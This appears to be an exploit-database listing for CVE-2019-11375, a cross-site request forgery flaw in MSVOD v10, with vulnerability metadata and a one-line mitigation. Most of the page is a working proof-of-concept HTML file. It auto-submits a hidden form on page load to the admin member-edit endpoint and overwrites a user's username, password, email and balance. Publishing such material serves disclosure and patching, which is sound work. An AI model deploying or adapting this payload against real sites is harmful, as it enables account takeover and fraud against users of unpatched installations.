header-logo
Suggest Exploit
vendor:
MSVOD
by:
ax8
6.5
CVSS
MEDIUM
Cross-Site Request Forgery (CSRF)
352
CWE
Product Name: MSVOD
Affected Version From: v10
Affected Version To: v10
Patch Exists: YES
Related CWE: CVE-2019-11375
CPE: a:msvodx:msvod:10
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: None
2019

Msvod v10 has a CSRF vulnerability to change user information

Msvod v10 has a CSRF vulnerability to change user information via the admin/member/edit.html URI. A malicious website can be created with a form that contains hidden inputs for username, nickname, email, tel, password, out_time, money, is_permanent, status, and id. When the form is submitted, the user's information is changed.

Mitigation:

Implementing a CSRF token in the form can prevent this attack.
Source

Exploit-DB raw data:

# Exploit Title: Msvod v10 has a CSRF vulnerability to change user information

# Date: 2019-04-14
# Exploit Author: ax8
# Vendor Homepage: https://github.com/Li-Siyuan
# Software Link: https://www.msvodx.com/
# Version: v10
# CVE : CVE-2019-11375

 

Msvod v10 has a CSRF vulnerability to change user information via the admin/member/edit.html URI.

 

<!--poc.html(change user infomation)-->

<!DOCTYPE html>

<html>

  <head>

  <title> CSRF Proof</title>

  <script type="text/javascript">

    function exec1(){

      document.getElementById('form1').submit();

    }

  </script>

  </head>

  <body onload="exec1();">

    <form id="form1" action="http://a.msvodx.cn/admin/member/edit.html" method="POST">

      <input type="hidden" name="username" value="hacker1" />

  <input type="hidden" name="nickname" value="hacker1" />

  <input type="hidden" name="email" value="hacker1" />

  <input type="hidden" name="tel" value="hacker1" />

      <input type="hidden" name="password" value="hacker1" />

      <input type="hidden" name="out_time" value="1970-01-01" />  

  <input type="hidden" name="money" value="30" />

  <input type="hidden" name="is_permanent" value="0" />

  <input type="hidden" name="status" value="1" />

  <input type="hidden" name="id" value="821" />

    </form>

  </body>

</html>

MISC:http://www.iwantacve.cn/index.php/archives/198/

Navigation

Suggest Exploit

Services By CQR